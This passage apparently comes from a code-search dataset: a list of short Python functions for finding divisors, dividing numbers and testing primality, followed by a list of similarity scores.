divisors", "def divisors(n):\r\n numbers = []\r\n for i in xrange(1, n+1):\r\n if n % i == 0:\r\n numbers.append(i)\r\n return numbers", "def sum_divisors(n):\r\n return sum(proper_divisors(n)) + n", "def prime_division(n):\n primes = primes1(int(math.sqrt(n)))\n for prime in reversed(primes):\n if n % prime == 0:\n print((prime, int(n/prime)))\n return (prime, int(n/prime))", "def trial_div(n: int) -> bool:\n if n == 1:\n return False\n i = 2\n while i**2 <= n:\n if n % i == 0:\n return False\n i += 1\n return True", "def get_divisors(n):\n n = abs(n)\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n%i == 0:\n divisors.append(i)\n divisors.append(-i)\n if i*i != n:\n divisors.append(n//i)\n divisors.append(-n//i)\n return sorted(divisors, key=abs)", "def divisors(n):\n return [x for x in range(1, n) if n % x == 0]", "def is_primary_trivial_division(n):\n mod = int(math.sqrt(n))\n for _ in xrange(2, mod + 1):\n if n % _ == 0:\n return 0\n return n", "def num_divisors(n):\n\tif n < 2:\n\t\treturn 1 \t# not really correct\n\t\n\tdivisors = 1\n\ti = 2\n\n\twhile n > 1:\n\t\tp = 0 \t# p will be the maximum x such that i^x evenly divides n\n\n\t\t# repeatedly divide n by i, and store the number of times into p\n\t\twhile (n % i == 0):\n\t\t\tn = n / i\n\t\t\tp += 1\n\n\t\tdivisors = divisors * (p + 1)\n\t\ti += 1\n\n\treturn divisors", "def find_divisors(n):\n\n\tpd = [1]\n\n\tsqrtN = int(math.sqrt(n))\n\n\tfor d in range(2, sqrtN+1):\n\t\tif n % d == 0:\n\t\t\tpd.append(d)\n\t\t\tpair = int(n/d)\n\t\t\tif not pair == d:\n\t\t\t\tpd.append(pair)\n\n\treturn pd", "def divisors(n):\n return tuple(_divisor_gen(n))", "def properDivisors(n):\n facs = [1]\n fac = 2\n while fac*fac <= n:\n if n%fac == 0:\n facs.append(fac)\n if fac*fac != n:\n facs.append(n/fac)\n fac += 1\n return facs", "def properDivisors(n):\n facs = [1]\n fac = 2\n while fac*fac <= n:\n if n%fac == 0:\n facs.append(fac)\n if fac*fac != n:\n facs.append(n/fac)\n fac += 1\n return facs", "def find_divisors(n: int) -> Set[int]:\n divisors = {1, n}\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n divisors.add(i)\n divisors.add(n // i)\n return divisors", "def count_divisors(n):\r\n if n == 1:\r\n return 0\r\n m = int(sqrt(n))\r\n c = 1\r\n if m * m == n:\r\n c += 1\r\n m -= 1\r\n for i in xrange(2, m+1):\r\n if n % i == 0:\r\n c += 2\r\n return c", "def divisors(n):\n d = []\n for i in range(1, int(math.sqrt(n) + 1)):\n if n % i == 0:\n d.append(i)\n d.append(n / i)\n return set(d)", "def count_divisions(num, n):\n count = 0\n while pe_005.is_divisible(num, n):\n num = num // n\n count += 1\n return count, num", "def is_div(n, m):\n # check if remainder\n return math.fmod(n, m)==0", "def divide(n1, n2):\n return n1 / n2", "def sumPropDiv(n):\n dSum = 0\n for x in range(1, int(n/2 + 1)):\n if n % x == 0:\n dSum += x\n return dSum", "def is_divisible(num, n):\n return num % n == 0", "def divisors(n: int) -> list:\n # iterate through every number <= n/2 and check whether the number is a divisor\n # append to list if not in list\n # in the end, append the number\n divs = [n]\n for i in range(1, n//2 + 1):\n if n % i == 0:\n divs.append(i)\n return divs", "def div2(x):\n if odd(x):\n x += n\n return x // 2 % n", "def proper_divisors(n: int) -> [int]:\n\n if n == 1:\n return []\n\n x = 2\n divisors = set([1])\n while x * x <= n and n > 1:\n if n % x == 0:\n divisors.add(x)\n divisors.add(n // x)\n\n x += 1\n\n s = sorted(divisors)\n return s", "def divide_exact(n,d):\n return floordiv(n,d),mod(n,d)", "def divisors(N):\n 
# Initialize the list of divisors\n divisor_list = [1]\n # Check division by d for d <= N/2\n for d in range(2,N // 2 + 1):\n if N % d == 0:\n divisor_list.append(d)\n divisor_list.append(N)\n return divisor_list", "def find_proper_divisors(n: int) -> Set[int]:\n\n divisors = find_divisors(n)\n return divisors - {n} # without n", "def div_numbers(a: int, b: int) -> int:\n return a / b", "def divisors(n):\n divs = [1]\n for p, e in factorization(n):\n divs += [x*p**k for k in range(1,e+1) for x in divs]\n return divs", "def division_algorithm(n):\n assert n < 1000\n decimals = []\n dividend = 1\n divisor = n\n counter = 0\n repeating, repeating_length = False, 0\n while dividend != 0 and not repeating:\n dividend = dividend * 10\n decimals.append(dividend // divisor)\n dividend = dividend % divisor\n counter += 1\n repeating, repeating_length = is_repeating(decimals)\n if repeating:\n counter = repeating_length\n return repeating, counter", "def factors(n):\n for x in range(1,n+1):\n if n % x == 0:\n print(x)", "def div(a,b):\r\n return a/b", "def d(n):\n rt = math.sqrt(n)\n i = 2\n result = 1\n while i < rt:\n if n % i == 0:\n result += i\n result += n // i\n i += 1\n\n # i == rt implies that n is a square number\n if i == rt and n % i == 0:\n result += i\n return result", "def div(num1, num2):\n return num1 / num2", "def div(num1, num2):\n return num1 / num2", "def div(self):\n a = self.nums()\n x = LibraryFunctions.per(a, 0.9) - LibraryFunctions.per(a, 0.1)\n return x / 2.58", "def divisible_by(n):\n return lambda x: x % n == 0", "def divisible_by(n):\n return lambda x: x % n == 0", "def div_by(n, list_of_num):\n for num in list_of_num:\n if not n % num:\n return True\n return False", "def n_photon_counting_div(self):\n inti = ct.c_ulong()\n self.lib.GetNumberPhotonCountingDivisions(ct.pointer(inti))\n return inti.value", "def evansMod(x,n):\n if x%n == 0:\n return 1\n else:\n return 0", "def get_divisores(num):\n divisores = [] #uso una lista para guardar los divisores\n for i in range(1, num):\n if num%i == 0:\n divisores.append(i)\n return divisores", "def fractionify(n):\n i = 0\n while True:\n if not n * 10 ** i % 1:\n break\n i += 1\n return n * 10 ** i, 10 ** i", "def snt(n):\r\n f = True\r\n for j in range(2, n):\r\n if n % j == 0:\r\n f = False\r\n break\r\n return f", "def smallest_number_divisible(n):\n\tprime_numbers = generate_prime_less_than_n(n)\n\tlog_n = math.log(n)\n\tres = 1\n\tfor pi in prime_numbers:\n\t\tres *= math.pow(pi, math.floor(log_n/math.log(pi)))\n\treturn res", "def findDivisors(n1, n2):\n divisors = () # the empty tuple\n for i in range(1, min(n1, n2) + 1):\n if n1%i == 0 and n2%i == 0:\n divisors = divisors + (i,)\n return divisors", "def factor(n):\n\n f = []\n\n for i in xrange(1, int(round(sqrt(n)))+1):\n if n%i == 0:\n f.append(i)\n f.append(n/i)\n\n return f", "def list_of_divisibles(n):\n def is_prime(x, L = []):\n if x in L or x == 2:\n return True\n elif x == 1 or x % 2 == 0:\n return False\n for divisor in range(1, round(x ** .5)):\n if is_prime(divisor, L):\n if x % divisor == 0:\n return False\n return True\n \n def largest_exponent(i, n):\n \"\"\"\n Given a limit n and a base i, finds the largest exponenet x such that i ^ x <= n, and outputs i ^ x.\n\n \"\"\"\n x = 1\n while i ** x <= n:\n x += 1\n x -= 1\n print(i, x, i**x)\n return i ** x\n \n L = []\n for i in range(2, n+1):\n if i in L:\n continue\n elif is_prime(i):\n L.append(largest_exponent(i, n))\n return L", "def longDivNoLimit(c, e, ns, n):\n if n == 0:\n return (Scientific(c, e), 
Nothing)\n else:\n e_prime = map.lookup(n, ns)\n if isJust(e_prime):\n return (Scientific(c, e), maybe.map(negate, e_prime))\n elif n < rat.denominator:\n return longDivNoLimit(c * 10, e - 1, map.insert(n, e, ns), n * 10)\n else:\n (q, r) = quotRemInteger(n, rat.denominator)\n return longDivNoLimit(c + q, e, ns, r)", "def set_photon_counting_divs(self, n, thres):\n thres = ct.c_long(thres)\n self.lib.SetPhotonCountingDivisions(ct.c_ulong(n), ct.pointer(thres))", "def sum_of_proper_divisors(number: int):\n divisors = []\n\n for n in range(1, number):\n if number % n == 0:\n divisors.append(n)\n\n return sum(divisors)", "def eq_div(N, i):\n return [] if i <= 0 else [N // i + 1] * (N % i) + [N // i] * (i - N % i)", "def factorPR(n):\r\n\tfor slow in [2,3,4,6]:\r\n\t\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n))); fast=slow; i=1\r\n\t\twhile i<numsteps:\r\n\t\t\tslow = (slow*slow + 1) % n\r\n\t\t\ti = i + 1\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tg = gcd(fast-slow,n)\r\n\t\t\tif (g != 1):\r\n\t\t\t\tif (g == n):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn g\r\n\treturn 1", "def the_division_is_aimed(numb1, numb2):\r\n return f\"Your result: {numb1//numb2}\"", "def faculteit_iteratief(n):\n res = 1\n\n # Voeg de iteratie in: for ...\n\n return res", "def findDivisor(num):\n divisors = [1]\n for i in range(2, int(sqrt(num)) + 1):\n if num % i == 0:\n divisors.append(i)\n temp = num / i\n if temp != i:\n divisors.append(temp)\n return divisors", "def list_of_divisors_v1(n):\n \"\"\"\n This is a slow algorithm. But it is correct.\n \"\"\"\n if n == 1:\n return [1]\n if n == 2:\n return [1,2]\n L = {}\n if n > 0:\n L[1] = True\n if n > 1:\n L[n] = True\n for i in list_of_prime_factors(n):\n L[i] = True\n for j in list_of_divisors(n // i):\n L[j] = True\n return L.keys()", "def n():\n # For documentation purposes", "def longDiv(c, e, n):\n if n == 0:\n return Scientific(c, e)\n else:\n # TODO: Use a logarithm here!\n # TODO: Can't use tail recursion like this in python!\n if n < d:\n return longDiv(c * 10, e - 1, n * 10)\n else:\n (q, r) = quotRemInteger(n, d)\n return longDiv(c+q, e, r)", "def div(a, b):\n\n c = 0\n d = b\n while True:\n if d > a:\n break\n else:\n c = c + 1\n d = d + b\n\n return c", "def div(x, y):\n return x / y", "def list_of_divisors_v2(n):\n return list(divisorGen(n))", "def gatherDivisors(number): # prvni string ve funkci je comment; \"\"\" znamenam ze je na vic radek\n\tdivisors = []\n\tfor div in range(1, number + 1): # range vyhodi vse od jedne az do number\n\t\tif number % div == 0:\n\t\t\tdivisors.append(div)\n\treturn divisors", "def d(n):\n if n not in d_memo:\n # Start with 1 so n isn't counted\n total = 1\n # Loop from 2 to sqrt(n)\n for i in xrange(2, int(n**0.5) + 1):\n if n % i == 0:\n total += i\n # Only add the other divisor if it isn't a square\n if i * i != n:\n total += n/i\n\n d_memo[n] = total\n\n return d_memo[n]", "def prime_divisors(n):\r\n\treturn list(set(factors(n)))", "def divisor (a,b):\n return a/b #i output a value by using the return statement", "def dividir(self):\n self.resultado = self.valor_1 / self.valor_2", "def __rdiv__(self, number):\n return self.__div__(number)", "def prime_divisors(n):\n\treturn tuple(set(factors(n)))", "def finddiv(x):\r\n \r\n div = (1, x)\r\n for i in range(2, x//2+1):\r\n if x%i==0:\r\n div+=(i,)\r\n return div", "def division(a, b):\n if b != 0:\n return a//b", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def 
find_divisors_2(number):\n divisors = [n for n in range(1, number) if number % n == 0]\n return divisors", "def prime_factor(n):\n while n > 1:\n k = 2 \n while n % k != 0:\n k = k+1\n n = n // k\n print(k)", "def dividir(value, arg):\n return int(value) /int(arg)", "def harmonic(n, s=1):\n res = 0.0\n for i in xrange(1, n+1):\n res += 1 / (float(i) ** s)\n return res", "def count_factors(n):\n i, total= 1, 0\n while i <= n:\n if n % i == 0:\n total += 1\n i += 1\n return total" ]
[ "0.8429677", "0.7996387", "0.78186643", "0.7653951", "0.75979793", "0.75530833", "0.74734193", "0.7455468", "0.74018323", "0.73676103", "0.73581624", "0.7303397", "0.7295638", "0.72913414", "0.72630566", "0.72216606", "0.7220337", "0.721529", "0.71952325", "0.71851534", "0.7180473", "0.7176454", "0.7116876", "0.7095198", "0.7089094", "0.7088498", "0.70863765", "0.70626825", "0.7058414", "0.70432365", "0.70424974", "0.703794", "0.70353943", "0.7034338", "0.70323795", "0.70323795", "0.70255095", "0.700288", "0.6992965", "0.6959495", "0.69349885", "0.6920324", "0.6891601", "0.68870544", "0.6870524", "0.68704396", "0.6868298", "0.68323064", "0.68318576", "0.68308747", "0.6809437", "0.6801501", "0.6790294", "0.6760769", "0.6726948", "0.6715591", "0.67081684", "0.67081684", "0.6633245", "0.6610264", "0.6610264", "0.65757775", "0.65465283", "0.65117687", "0.65071476", "0.6499388", "0.6497775", "0.64940417", "0.6493268", "0.648213", "0.6440706", "0.64353853", "0.6435166", "0.64090115", "0.63780415", "0.63761425", "0.63643146", "0.63516486", "0.6339351", "0.6333005", "0.6312185", "0.6307855", "0.6298333", "0.6294619", "0.62763804", "0.627337", "0.6265573", "0.62635237", "0.62592536", "0.62559175", "0.625508", "0.62484866", "0.62427986", "0.6233572", "0.62224436", "0.62194026", "0.62191147", "0.621092", "0.619655", "0.61953044" ]
0.73575246
11
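
A quick illustration of the divisori document above (the calls and expected outputs below are illustrative additions, not dataset content):

# Minimal sketch: exercising divisori on a non-square and a perfect square.
print(divisori(28))   # -> [1, 2, 4, 7, 14, 28]
print(divisori(36))   # -> [1, 2, 3, 4, 6, 9, 12, 18, 36]
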
First n digits of the number num
import math

def first_n_digits(num, n):
    # Keep only the n most significant digits of num.
    # Note: math.log is float-based and can be off by one when num sits
    # at an exact power of 10.
    return num // 10 ** (int(math.log(num, 10)) - n + 1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isprime(n):\r\n\treturn is_prime(n)", "def comprobar_primo(num):\n primo = True\n for i in range(2, num):\n if num%i == 0:\n primo = False\n return primo", "def isprime(n):\n\treturn is_prime(n)", "def get_prime_factor(n):\n if n % 2 == 0:\n return 2\n for num in range(3, n + 1, 2):\n if n % num == 0:\n return num", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n return mr_prime(n)", "def nPrime(n):\n\n start = 1\n while n != 1:\n start += 2\n if isPrime(start):\n n -= 1\n # end of if\n\n return start", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n elif n % 2 == 0:\n return False\n else:\n x = 0\n for i in range(3, n, 2):\n if n % i == 0:\n x = 1\n return x == 0", "def is_prime(n):\n if n <= 1:\n return False\n elif n <= 2:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3, int(n**.5) + 1, 2):\n if n % i == 0:\n return False\n return True", "def isPrime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n\n return True", "def isPrime(n):\n\n if n < 2:\n return False\n elif n in {2,3}:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3,math.floor(math.sqrt(n))+1,2):\n if n % i == 0:\n return False\n else:\n return True", "def is_prime(n):\n k = 2\n while n % k != 0:\n k += 1\n if k < n:\n return False\n else:\n return True", "def isprime(n):\n if n == 2: return True\n if n == 3: return True\n if n % 2 == 0: return False\n if n % 3 == 0: return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def coPrime(x):\n\n n = x * 2 + 100000 # Upper limit for range of random integers\n y = random.randint(x * 2, n)\n if (fractions.gcd(x, y) != 1):\n return coPrime(x)\n else:\n return y", "def if_prime(cls, n):\n\n if (n <= 1):\n return False\n if (n <= 3):\n return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while(i * i <= n):\n if (n % i == 0 or n % (i + 2) == 0):\n return False\n i = i + 6\n\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if (n%2) == 0:\n return False\n for i in range(3,integer_sqrt(n)+1,2):\n if (n%i) == 0:\n return False\n return True", "def basicIsPrime(n,K=100):\n if n % 2 == 0:\n return n == 2\n if n in primesList.lessThanHundredThousand:\n return True\n return None", "def isPrime(n):\r\n if n == 2:\r\n return True\r\n if n == 3:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n if n % 3 == 0:\r\n return False\r\n\r\n i = 5\r\n w = 2\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n return False\r\n\r\n i += w\r\n w = 6 - w\r\n\r\n return True", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n\tprime = True\n\tif n == 1:\n\t\tprime = False\n\tc = 2\n\twhile c * c <= n:\n\t\tif n % c == 0:\n\t\t\tprime = False\n\t\tc += 1\n\treturn prime", "def isprime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def test_prime(n):\n if SIEVE[n]:\n return 
True\n else:\n return False", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i ** 2 <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n in [2,3]:\n return True\n if n % 2 == 0:\n return False\n\n for factor in range(3, int(math.sqrt(n))+1, 2):\n if n % factor == 0:\n return False\n return True", "def is_prime(n):\n if n < 1 or n % 1 > 0:\n return False\n if n == 1 or n == 2:\n return True\n for i in range(3, int(math.sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def isprime(n):\n if n == 1:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def is_prime(n):\n if n == 2:\n return True\n if n == 0 or n == 1 or n % 2 == 0:\n return False\n for i in range(3, int(math.sqrt(n))+1, 2):\n if n % i == 0:\n return False\n return True", "def isPrime(n):\r\n # Znamo da 1 nije prost broj\r\n if n == 1:\r\n return False\r\n\r\n i = 2\r\n # Petlja se vrti od 2 do int(sqrt(x)) \r\n while i*i <= n:\r\n # Provjera da li i dijeli x bez ostatka\r\n if n % i == 0:\r\n # To znači da n ima faktor između 2 i sqrt(n)\r\n # Stoga nije prost broj\r\n return False\r\n i += 1\r\n # Ako nismo pronašli nijedan faktor u gornjoj petlji\r\n # onda je n prost broj\r\n return True", "def next_prime(n):\n i = n + 1\n while not is_prime(i):\n i += 1\n return i", "def isPrime(n: int):\n if n <= 1:\n return False\n\n for i in range(2, n-1):\n if n % i == 0:\n # print(\"{} is divisable by {}\".format(n, i))\n return False\n\n return True", "def getNPrime(num):\n prime_numbers = []\n for i in range(num):\n if isPrime(i + 1):\n prime_numbers.append(i)\n return prime_numbers", "def is_prime(n):\n if n <= 1: return False\n if n <= 3: return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def is_prime(num):\n import math\n\n\n if num % 2 == 0 and num > 2:\n return False\n for i in range(3, int(math.sqrt(num))+1, 2):\n if num % i == 0:\n return False\n return True", "def is_prime(n):\n if n == 2:\n return True\n\n if n < 2 or n % 2 == 0:\n return False\n\n for i in range(3, int(sqrt(n)+1), 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n if n == 1:\n return False\n else:\n i = 2\n while i < n:\n if n % i == 0:\n return False\n i += 1\n return True", "def get_larger_prime(n):\n result = n + (1 if n % 2 == 0 else 2)\n while not is_prime(result):\n result += 2\n return result", "def prime_test(n,p):\n for i in range(2, p):\n thing = 1\n while thing == 1:\n if n % i == 0:\n n = n/i\n else:\n thing = 0\n if n == 1:\n return False\n return True", "def is_prime(num):\n\n assert num >= 0, \"Num should be a positive integer!\"\n\n if num < 2:\n return False\n\n if num == 2:\n return True\n\n if num % 2 == 0:\n return False\n\n n = 3\n while n * n <= num:\n if num % n == 0:\n return False\n n += 2\n\n return True", "def is_prime(n):\n for i in range(2,n):\n if n % 
i == 0:\n return False\n return True", "def primenumber(x):\n if x >= 2:\n for y in range(2,x):\n if not (x % y):\n return False\n else:\n return False\n return True", "def is_prime(n: int) -> bool:\n if n <= 3:\n return n > 1\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i ** 2 <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n \n return True", "def is_Prime(n):\n\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(n ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def primfact(e):\n for n in range(2, e):\n for x in range(2, n):\n if n % x == 0:\n break\n else:\n print n,", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n <= 1:\n return False\n if n < 4:\n return True\n if n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n\n limit = int(math.floor(math.sqrt(n)))\n i = 5\n while i <= limit:\n if n % i == 0:\n return False\n if n % (i + 2) == 0:\n return False\n i += 6\n return True", "def isprime(n):\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(int(n ** 0.5) ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def isprime(n):\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def low_prime(n):\n if n < 2 or n - round(n) != 0:\n print('Numbers smaller than 2 and non-integers do not have prime',\n 'factors')\n return None\n for i in range(2, int(sqrt(n) + 2)):\n if n % i == 0 and is_prime(i):\n return i\n return n", "def basic_is_prime(_n):\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 
1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 
